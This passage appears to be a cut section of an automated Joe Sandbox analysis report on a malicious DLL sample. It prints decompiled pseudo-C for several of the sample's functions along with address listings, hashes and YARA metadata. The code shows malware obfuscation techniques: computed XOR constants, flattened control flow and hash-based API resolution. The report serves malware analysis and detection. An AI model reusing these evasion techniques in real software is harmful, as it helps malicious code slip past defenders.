									}
								}
							}
						}
					}
					return _t162;
				}
				_v544 = 0xee725a;
				_v544 = _v544 ^ 0x4fb40d60;
				_v544 = _v544 | 0x3a9e06c5;
				_v544 = _v544 ^ 0x55f97f1d;
				__eflags = _t163 - _v544;
				_t162 =  ==  ? 1 : _t162;
				__eflags = _t162;
				_t141 = 0xdb9fdb2;
				goto L15;
			}




























                                                                                                          0x02af3eaa
                                                                                                          0x02af3eb0
                                                                                                          0x02af3eba
                                                                                                          0x02af3ec2
                                                                                                          0x02af3ec7
                                                                                                          0x02af3ecf
                                                                                                          0x02af3ed7
                                                                                                          0x02af3edf
                                                                                                          0x02af3ee7
                                                                                                          0x02af3eec
                                                                                                          0x02af3ef1
                                                                                                          0x02af3ef9
                                                                                                          0x02af3f09
                                                                                                          0x02af3f0e
                                                                                                          0x02af3f14
                                                                                                          0x02af3f1c
                                                                                                          0x02af3f23
                                                                                                          0x02af3f26
                                                                                                          0x02af3f2a
                                                                                                          0x02af3f32
                                                                                                          0x02af3f3a
                                                                                                          0x02af3f42
                                                                                                          0x02af3f4a
                                                                                                          0x02af3f52
                                                                                                          0x02af3f5a
                                                                                                          0x02af3f62
                                                                                                          0x02af3f6a
                                                                                                          0x02af3f77
                                                                                                          0x02af3f7b
                                                                                                          0x02af3f83
                                                                                                          0x02af3f8b
                                                                                                          0x02af3f90
                                                                                                          0x02af3f98
                                                                                                          0x02af3fa0
                                                                                                          0x02af3fa8
                                                                                                          0x02af3fad
                                                                                                          0x02af3fb5
                                                                                                          0x02af3fbd
                                                                                                          0x02af3fc2
                                                                                                          0x02af3fc7
                                                                                                          0x02af3fcf
                                                                                                          0x02af3fdc
                                                                                                          0x02af3fe0
                                                                                                          0x02af3fe4
                                                                                                          0x02af3fed
                                                                                                          0x02af3ff9
                                                                                                          0x02af3ffd
                                                                                                          0x02af4005
                                                                                                          0x02af400d
                                                                                                          0x02af4015
                                                                                                          0x02af401d
                                                                                                          0x02af4029
                                                                                                          0x02af402c
                                                                                                          0x02af4030
                                                                                                          0x02af4034
                                                                                                          0x02af403c
                                                                                                          0x02af4044
                                                                                                          0x02af4049
                                                                                                          0x02af4051
                                                                                                          0x02af4063
                                                                                                          0x02af4124
                                                                                                          0x00000000
                                                                                                          0x02af4069
                                                                                                          0x02af406f
                                                                                                          0x02af4118
                                                                                                          0x02af411a
                                                                                                          0x00000000
                                                                                                          0x02af4075
                                                                                                          0x02af407b
                                                                                                          0x02af40ed
                                                                                                          0x02af40f2
                                                                                                          0x02af40f5
                                                                                                          0x02af40f7
                                                                                                          0x00000000
                                                                                                          0x02af407d
                                                                                                          0x02af4083
                                                                                                          0x02af40ab
                                                                                                          0x02af40c2
                                                                                                          0x02af40c7
                                                                                                          0x02af40ca
                                                                                                          0x02af40cc
                                                                                                          0x02af40d2
                                                                                                          0x00000000
                                                                                                          0x02af40d2
                                                                                                          0x02af4085
                                                                                                          0x02af408b
                                                                                                          0x02af415f
                                                                                                          0x02af415f
                                                                                                          0x02af4165
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af4091
                                                                                                          0x02af4095
                                                                                                          0x02af409a
                                                                                                          0x02af409e
                                                                                                          0x02af40a4
                                                                                                          0x00000000
                                                                                                          0x02af40a4
                                                                                                          0x02af409e
                                                                                                          0x02af408b
                                                                                                          0x02af4083
                                                                                                          0x02af407b
                                                                                                          0x02af406f
                                                                                                          0x02af4177
                                                                                                          0x02af4177
                                                                                                          0x02af412e
                                                                                                          0x02af4138
                                                                                                          0x02af4141
                                                                                                          0x02af4149
                                                                                                          0x02af4155
                                                                                                          0x02af4157
                                                                                                          0x02af4157
                                                                                                          0x02af415a
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4r~$Zr$n<$p3
                                                                                                          • API String ID: 0-1989199487
                                                                                                          • Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
                                                                                                          • Instruction ID: bd9f51e26cc270dbdb023b09e6c354ef29dfc25cb8fe5ecec697f531e6f56d7d
                                                                                                          • Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
                                                                                                          • Instruction Fuzzy Hash: 196145715093009FC398CF66C58942BBBF1FBD8758F104A2DF29AA6624D778CA49CF46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF85FF, Relevance: 5.1, Strings: 4, Instructions: 142COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 65%
                                                                                                          			E02AF85FF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				char _v80;
				char _v148;
				void* _t125;
				signed int _t148;
				signed int _t149;
				intOrPtr _t165;
				char _t166;

				_t165 = _a4;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t125);
				_v56 = _v56 & 0x00000000;
				_v64 = 0x4c8eee;
				_v60 = 0xd08445;
				_v12 = 0x2b5b52;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x243df932;
				_t148 = 0x1b;
				_v12 = _v12 / _t148;
				_v12 = _v12 ^ 0x0511db29;
				_v32 = 0x4cbd6f;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x02619ccd;
				_v8 = 0x229cdc;
				_v8 = _v8 ^ 0x1dfe7fc6;
				_v8 = _v8 + 0x780d;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0ee175b3;
				_v40 = 0x8e82d1;
				_v40 = _v40 + 0xffffcc21;
				_t149 = 0x39;
				_v40 = _v40 * 0x69;
				_v40 = _v40 ^ 0x3a51eacf;
				_v20 = 0xb8087c;
				_v20 = _v20 * 0x23;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00c96169;
				_v24 = 0x5c9964;
				_v24 = _v24 / _t149;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00085b7f;
				_v36 = 0xf34403;
				_v36 = _v36 * 0x6a;
				_v36 = _v36 | 0x7504e0f6;
				_v36 = _v36 ^ 0x75b6ad40;
				_v28 = 0x74a083;
				_v28 = _v28 * 0x7e;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00e859e6;
				_v48 = 0x5be020;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x02dd1a4a;
				_v44 = 0xfc2deb;
				_v44 = _v44 + 0x1b3b;
				_v44 = _v44 ^ 0x00f2ef0d;
				_v52 = 0x7de099;
				_v52 = _v52 ^ 0xb346769d;
				_v52 = _v52 ^ 0xb330844a;
				_v16 = 0x4076ee;
				_v16 = _v16 * 0xa;
				_v16 = _v16 * 0x14;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x2e751909;
				_t150 = _v12;
				_push( &_v148);
				_t166 = 0x44;
				_push(_t166);
				E02AFFE2A(_v12, _v32);
				_v148 = _t166;
				if(E02B02C24(_a8, _v8, _v12, _t150, _v40, _t150, _v20, _a20, _v24,  &_v148, _t150, _v36, _v28, _t150, _a12,  &_v80) == 0) {
					return 0;
				}
				if(_t165 == 0) {
					E02B01538(_v48, _v44, _v80);
					E02B01538(_v52, _v16, _v76);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}


























                                                                                                          0x02af860a
                                                                                                          0x02af860d
                                                                                                          0x02af860f
                                                                                                          0x02af8612
                                                                                                          0x02af8615
                                                                                                          0x02af8618
                                                                                                          0x02af861b
                                                                                                          0x02af861e
                                                                                                          0x02af861f
                                                                                                          0x02af8620
                                                                                                          0x02af8621
                                                                                                          0x02af8626
                                                                                                          0x02af862c
                                                                                                          0x02af8633
                                                                                                          0x02af863a
                                                                                                          0x02af8641
                                                                                                          0x02af8645
                                                                                                          0x02af8651
                                                                                                          0x02af8656
                                                                                                          0x02af865b
                                                                                                          0x02af8662
                                                                                                          0x02af8669
                                                                                                          0x02af866d
                                                                                                          0x02af8671
                                                                                                          0x02af8678
                                                                                                          0x02af867f
                                                                                                          0x02af8686
                                                                                                          0x02af868d
                                                                                                          0x02af8690
                                                                                                          0x02af8697
                                                                                                          0x02af869e
                                                                                                          0x02af86a9
                                                                                                          0x02af86aa
                                                                                                          0x02af86ad
                                                                                                          0x02af86b4
                                                                                                          0x02af86bf
                                                                                                          0x02af86c2
                                                                                                          0x02af86c6
                                                                                                          0x02af86cd
                                                                                                          0x02af86d9
                                                                                                          0x02af86dc
                                                                                                          0x02af86e0
                                                                                                          0x02af86e7
                                                                                                          0x02af86f2
                                                                                                          0x02af86f5
                                                                                                          0x02af86fc
                                                                                                          0x02af8703
                                                                                                          0x02af870e
                                                                                                          0x02af8711
                                                                                                          0x02af8715
                                                                                                          0x02af871c
                                                                                                          0x02af8723
                                                                                                          0x02af8727
                                                                                                          0x02af872e
                                                                                                          0x02af8735
                                                                                                          0x02af873c
                                                                                                          0x02af8743
                                                                                                          0x02af874a
                                                                                                          0x02af8751
                                                                                                          0x02af8758
                                                                                                          0x02af8763
                                                                                                          0x02af876a
                                                                                                          0x02af8773
                                                                                                          0x02af8777
                                                                                                          0x02af8781
                                                                                                          0x02af8784
                                                                                                          0x02af8787
                                                                                                          0x02af8788
                                                                                                          0x02af8789
                                                                                                          0x02af8791
                                                                                                          0x02af87cc
                                                                                                          0x00000000
                                                                                                          0x02af87fe
                                                                                                          0x02af87d0
                                                                                                          0x02af87e7
                                                                                                          0x02af87f5
                                                                                                          0x02af87d2
                                                                                                          0x02af87d5
                                                                                                          0x02af87d6
                                                                                                          0x02af87d7
                                                                                                          0x02af87d8
                                                                                                          0x02af87d8
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: [$R[+$Y$v@
                                                                                                          • API String ID: 0-1276245682
                                                                                                          • Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
                                                                                                          • Instruction ID: fa244ebdfb874b960f57c38f80f6da0586d2de9e965bffb0c4a8e08c4c0854b7
                                                                                                          • Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
                                                                                                          • Instruction Fuzzy Hash: BA614472C00209EFCF09CFE4D94AAEEBBB5FB48304F108159E915BA250D7B95A55CFA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF9A01, Relevance: 5.1, Strings: 4, Instructions: 140COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 90%
                                                                                                          			E02AF9A01(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t106;
				intOrPtr _t127;
				void* _t128;
				void* _t130;
				intOrPtr _t143;
				void* _t144;
				void* _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				void* _t150;
				void* _t151;

				_push(_a12);
				_t144 = __edx;
				_t128 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t106);
				_v4 = 0x81363a;
				_t151 = _t150 + 0x14;
				_v4 = _v4 | 0xe86970e7;
				_v4 = _v4 ^ 0xe8e8406c;
				_t145 = 0;
				_v8 = 0xe36f3c;
				_t130 = 0x9d12efa;
				_t10 =  &_v8; // 0xe36f3c
				_t146 = 0x18;
				_v8 =  *_t10 / _t146;
				_v8 = _v8 ^ 0x000ac4f9;
				_v28 = 0x86ae71;
				_v28 = _v28 + 0x307d;
				_v28 = _v28 ^ 0x3f5774ce;
				_v28 = _v28 ^ 0x3fdb82be;
				_v12 = 0xd5596e;
				_t147 = 0x24;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0x618cdae6;
				_v16 = 0xa0cb2;
				_v16 = _v16 + 0x618a;
				_v16 = _v16 + 0xfb99;
				_v16 = _v16 ^ 0x0001ef53;
				_v20 = 0xb65aa2;
				_v20 = _v20 | 0x7ee7663c;
				_v20 = _v20 + 0xffff14a1;
				_v20 = _v20 ^ 0x7ef81620;
				_v24 = 0x69cefc;
				_v24 = _v24 * 5;
				_v24 = _v24 ^ 0x0216a415;
				_v44 = 0xc8ca94;
				_v44 = _v44 * 0x55;
				_v44 = _v44 << 0xc;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x2d01fb93;
				_v32 = 0xaa7e08;
				_v32 = _v32 << 6;
				_v32 = _v32 / _t147;
				_v32 = _v32 | 0xdbfc63c4;
				_v32 = _v32 ^ 0xdbf76cca;
				_v36 = 0x12ed95;
				_v36 = _v36 + 0xd11f;
				_t148 = 0x64;
				_v36 = _v36 / _t148;
				_v36 = _v36 ^ 0x700cfa35;
				_v36 = _v36 ^ 0x700e1ad8;
				_v40 = 0xf66f66;
				_v40 = _v40 + 0xffff4d0b;
				_v40 = _v40 + 0xffffdddb;
				_v40 = _v40 + 0xffff052c;
				_v40 = _v40 ^ 0x00f507b6;
				do {
					while(_t130 != 0x348ce2d) {
						if(_t130 == 0x5264aba) {
							_t143 =  *0x2b06228; // 0x0
							E02B02B09(_v32, _t143, _v36, _v40);
						} else {
							if(_t130 == 0x5e19b60) {
								if(E02B03EE9() != 0) {
									_t130 = 0x348ce2d;
									continue;
								}
							} else {
								if(_t130 == 0x8610059) {
									E02AEDCA0();
									_t130 = 0x5264aba;
									continue;
								} else {
									if(_t130 != 0x9d12efa) {
										goto L12;
									} else {
										_push(_t130);
										_push(_t130);
										_t127 = E02AEC5D8(0x30);
										_t151 = _t151 + 0xc;
										 *0x2b06228 = _t127;
										_t130 = 0x5e19b60;
										continue;
									}
								}
							}
						}
						L15:
						return _t145;
					}
					_t145 = E02AE3271(_v16, _t144, _v20, _t128, _v24, _v44);
					_t151 = _t151 + 0x10;
					if(_t145 == 0) {
						_t130 = 0x8610059;
						goto L12;
					}
					goto L15;
					L12:
				} while (_t130 != 0xbdf1695);
				goto L15;
			}


























                                                                                                          0x02af9a08
                                                                                                          0x02af9a0c
                                                                                                          0x02af9a0e
                                                                                                          0x02af9a10
                                                                                                          0x02af9a14
                                                                                                          0x02af9a18
                                                                                                          0x02af9a19
                                                                                                          0x02af9a1a
                                                                                                          0x02af9a1f
                                                                                                          0x02af9a27
                                                                                                          0x02af9a2a
                                                                                                          0x02af9a34
                                                                                                          0x02af9a3c
                                                                                                          0x02af9a3e
                                                                                                          0x02af9a46
                                                                                                          0x02af9a4b
                                                                                                          0x02af9a51
                                                                                                          0x02af9a56
                                                                                                          0x02af9a5c
                                                                                                          0x02af9a64
                                                                                                          0x02af9a6c
                                                                                                          0x02af9a74
                                                                                                          0x02af9a7c
                                                                                                          0x02af9a84
                                                                                                          0x02af9a91
                                                                                                          0x02af9a94
                                                                                                          0x02af9a98
                                                                                                          0x02af9aa0
                                                                                                          0x02af9aa8
                                                                                                          0x02af9ab0
                                                                                                          0x02af9ab8
                                                                                                          0x02af9ac0
                                                                                                          0x02af9ac8
                                                                                                          0x02af9ad0
                                                                                                          0x02af9ad8
                                                                                                          0x02af9ae0
                                                                                                          0x02af9af5
                                                                                                          0x02af9af9
                                                                                                          0x02af9b01
                                                                                                          0x02af9b0e
                                                                                                          0x02af9b12
                                                                                                          0x02af9b17
                                                                                                          0x02af9b1c
                                                                                                          0x02af9b24
                                                                                                          0x02af9b2c
                                                                                                          0x02af9b39
                                                                                                          0x02af9b3d
                                                                                                          0x02af9b45
                                                                                                          0x02af9b4d
                                                                                                          0x02af9b55
                                                                                                          0x02af9b61
                                                                                                          0x02af9b69
                                                                                                          0x02af9b6d
                                                                                                          0x02af9b75
                                                                                                          0x02af9b7d
                                                                                                          0x02af9b85
                                                                                                          0x02af9b8d
                                                                                                          0x02af9b95
                                                                                                          0x02af9b9d
                                                                                                          0x02af9ba5
                                                                                                          0x02af9ba5
                                                                                                          0x02af9baf
                                                                                                          0x02af9c4a
                                                                                                          0x02af9c54
                                                                                                          0x02af9bb5
                                                                                                          0x02af9bbb
                                                                                                          0x02af9c08
                                                                                                          0x02af9c0a
                                                                                                          0x00000000
                                                                                                          0x02af9c0a
                                                                                                          0x02af9bbd
                                                                                                          0x02af9bc3
                                                                                                          0x02af9bf5
                                                                                                          0x02af9bfa
                                                                                                          0x00000000
                                                                                                          0x02af9bc5
                                                                                                          0x02af9bcb
                                                                                                          0x00000000
                                                                                                          0x02af9bcd
                                                                                                          0x02af9bdd
                                                                                                          0x02af9bde
                                                                                                          0x02af9be1
                                                                                                          0x02af9be6
                                                                                                          0x02af9be9
                                                                                                          0x02af9bee
                                                                                                          0x00000000
                                                                                                          0x02af9bee
                                                                                                          0x02af9bcb
                                                                                                          0x02af9bc3
                                                                                                          0x02af9bbb
                                                                                                          0x02af9c5c
                                                                                                          0x02af9c64
                                                                                                          0x02af9c64
                                                                                                          0x02af9c26
                                                                                                          0x02af9c28
                                                                                                          0x02af9c2d
                                                                                                          0x02af9c2f
                                                                                                          0x00000000
                                                                                                          0x02af9c2f
                                                                                                          0x00000000
                                                                                                          0x02af9c34
                                                                                                          0x02af9c34
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <f~$<o$l@$}0
                                                                                                          • API String ID: 0-758050912
                                                                                                          • Opcode ID: 59b7a53f7b64c0247829e27144debfb095d9884dbf06cc085eca7f0d9362ea46
                                                                                                          • Instruction ID: c9f299d5d8a48ba1f1e515c8cfe7e8306eb8b00454538548fe40138b28993953
                                                                                                          • Opcode Fuzzy Hash: 59b7a53f7b64c0247829e27144debfb095d9884dbf06cc085eca7f0d9362ea46
                                                                                                          • Instruction Fuzzy Hash: 4C518571508301AFC784CF62C48952FBFE1EFC8358F50590DF69696260D7B58A49CF86
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE2194, Relevance: 5.1, Strings: 4, Instructions: 83COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 58%
                                                                                                          			E02AE2194(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t67;
				intOrPtr* _t77;
				signed int _t80;
				signed int _t81;
				void* _t88;

				_t88 = __ecx;
				E02AFFE29(_t67);
				_v28 = 0x23b662;
				_v24 = 0;
				_v12 = 0x5a4623;
				_v12 = _v12 + 0x2367;
				_v12 = _v12 ^ 0x11a2f25e;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x3f16c1ec;
				_v20 = 0x4a1b7a;
				_v20 = _v20 ^ 0x2a8c83f5;
				_v20 = _v20 ^ 0x0b06bd0c;
				_v20 = _v20 ^ 0x21c6558f;
				_v8 = 0x75635a;
				_v8 = _v8 >> 0xc;
				_t80 = 0x19;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x5f69645e;
				_v8 = _v8 ^ 0x5f68d09e;
				_v16 = 0xc2b090;
				_v16 = _v16 + 0xffff85c8;
				_t81 = 0x7c;
				_v16 = _v16 / _t81;
				_v16 = _v16 ^ 0x000d5e79;
				_t77 = E02AEEB52(_t81, _t81, 0x525cea78, 0xe3, 0x4be980c1);
				return  *_t77(_a56, _a36, _a48, 0, 0, _a16, _a60, _t88, _a44, _a52, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44, _a48, _a52, _a56, _a60);
			}














                                                                                                          0x02ae21a1
                                                                                                          0x02ae21cb
                                                                                                          0x02ae21d0
                                                                                                          0x02ae21da
                                                                                                          0x02ae21df
                                                                                                          0x02ae21e6
                                                                                                          0x02ae21ed
                                                                                                          0x02ae21f4
                                                                                                          0x02ae21f8
                                                                                                          0x02ae21ff
                                                                                                          0x02ae2206
                                                                                                          0x02ae220d
                                                                                                          0x02ae2214
                                                                                                          0x02ae221b
                                                                                                          0x02ae2222
                                                                                                          0x02ae222b
                                                                                                          0x02ae2230
                                                                                                          0x02ae2235
                                                                                                          0x02ae223c
                                                                                                          0x02ae2243
                                                                                                          0x02ae224a
                                                                                                          0x02ae2254
                                                                                                          0x02ae225c
                                                                                                          0x02ae225f
                                                                                                          0x02ae227e
                                                                                                          0x02ae22a5

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #FZ$^di_$g#$y^
                                                                                                          • API String ID: 0-3614166594
                                                                                                          • Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
                                                                                                          • Instruction ID: 165565bb9386103c29cbc831cdc4707ac25fa56d5a1dbdc65ac6a67862820301
                                                                                                          • Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
                                                                                                          • Instruction Fuzzy Hash: 0A31F272800208FBCF45DFA5DD098DEBFB6FF89314F508159FA15A6120D3B68A60AF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF8FAE, Relevance: 4.1, Strings: 3, Instructions: 312COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02AF8FAE(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t364;
				void* _t367;
				void* _t375;
				void* _t379;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t420;
				intOrPtr* _t425;
				void* _t429;
				signed int* _t430;

				_t430 =  &_v164;
				_v44 = 0xc56d85;
				_v44 = _v44 | 0x6747c0a0;
				_v44 = _v44 ^ 0x67c7eda5;
				_v148 = 0xd0221b;
				_v148 = _v148 + 0xb86b;
				_t425 = __ecx;
				_t429 = 0;
				_t382 = 0x2d;
				_v4 = __ecx;
				_t379 = 0x771143;
				_v148 = _v148 / _t382;
				_v148 = _v148 * 0x66;
				_v148 = _v148 ^ 0x01d966be;
				_v152 = 0x268288;
				_v152 = _v152 + 0xc42a;
				_v152 = _v152 * 0x1a;
				_v152 = _v152 | 0x9e13f09a;
				_v152 = _v152 ^ 0x9ffffe9e;
				_v84 = 0x856365;
				_v84 = _v84 + 0xffff26a7;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0848a0c0;
				_v72 = 0xf332ed;
				_v72 = _v72 ^ 0xef6a6dd6;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x03be657c;
				_v120 = 0xd51e66;
				_v120 = _v120 | 0x823b6191;
				_v120 = _v120 + 0xffffb8fb;
				_v120 = _v120 + 0xaa7;
				_v120 = _v120 ^ 0x82fd9684;
				_v108 = 0xd10da2;
				_v108 = _v108 + 0xffff1c26;
				_v108 = _v108 + 0xffff12ce;
				_v108 = _v108 ^ 0x00cc3eec;
				_v76 = 0x14aa13;
				_v76 = _v76 ^ 0xa7d92c4a;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0x000074b4;
				_v92 = 0x17a820;
				_v92 = _v92 ^ 0x3a93bf92;
				_v92 = _v92 | 0x1a458659;
				_v92 = _v92 ^ 0x3acb9ffe;
				_v144 = 0x9f1ca1;
				_v144 = _v144 << 3;
				_v144 = _v144 | 0x88246970;
				_v144 = _v144 + 0x8e62;
				_v144 = _v144 ^ 0x8cf667c6;
				_v52 = 0x8da33b;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x00059428;
				_v96 = 0x1abb08;
				_v96 = _v96 ^ 0x6c742edf;
				_v96 = _v96 + 0xffff01f6;
				_v96 = _v96 ^ 0x6c6614ef;
				_v112 = 0x9f0f81;
				_v112 = _v112 * 0x6a;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x083a0fed;
				_v156 = 0x609a24;
				_v156 = _v156 + 0xffff683f;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0xcd31;
				_v156 = _v156 ^ 0x0c079756;
				_v164 = 0xe5cc1d;
				_v164 = _v164 << 7;
				_v164 = _v164 | 0x9a492847;
				_v164 = _v164 * 0x78;
				_v164 = _v164 ^ 0xa012b17f;
				_v128 = 0x53ee3c;
				_t120 =  &_v128; // 0x53ee3c
				_t383 = 0x29;
				_v128 =  *_t120 / _t383;
				_v128 = _v128 ^ 0x929088a5;
				_v128 = _v128 + 0xa7c3;
				_v128 = _v128 ^ 0x929242c1;
				_v140 = 0x5f30f1;
				_v140 = _v140 | 0xd1491927;
				_t384 = 0x7c;
				_v140 = _v140 / _t384;
				_t385 = 0x58;
				_v140 = _v140 / _t385;
				_v140 = _v140 ^ 0x000295f0;
				_v88 = 0x55e174;
				_v88 = _v88 ^ 0x7dd6f036;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x000a8d63;
				_v28 = 0xb452eb;
				_v28 = _v28 + 0xffff5322;
				_v28 = _v28 ^ 0x00ba2bf5;
				_v36 = 0x42507a;
				_v36 = _v36 | 0xf1dc1e20;
				_v36 = _v36 ^ 0xf1d9c77b;
				_v80 = 0xc31b4e;
				_v80 = _v80 ^ 0xd2ac5232;
				_t386 = 0x43;
				_v80 = _v80 / _t386;
				_v80 = _v80 ^ 0x03298e6e;
				_v124 = 0x46c8cc;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 5;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x1b2fd4b6;
				_v132 = 0x745205;
				_v132 = _v132 ^ 0x1862e0ae;
				_v132 = _v132 << 5;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x0007d289;
				_v20 = 0x713f0f;
				_v20 = _v20 ^ 0x61c76558;
				_v20 = _v20 ^ 0x61bb476a;
				_v48 = 0x3998c0;
				_v48 = _v48 | 0xd3555304;
				_v48 = _v48 ^ 0xd37b9815;
				_v160 = 0xe5ad6c;
				_v160 = _v160 * 0x3a;
				_v160 = _v160 | 0x660736ab;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xefd0e6e0;
				_v60 = 0x9fc9f5;
				_v60 = _v60 >> 7;
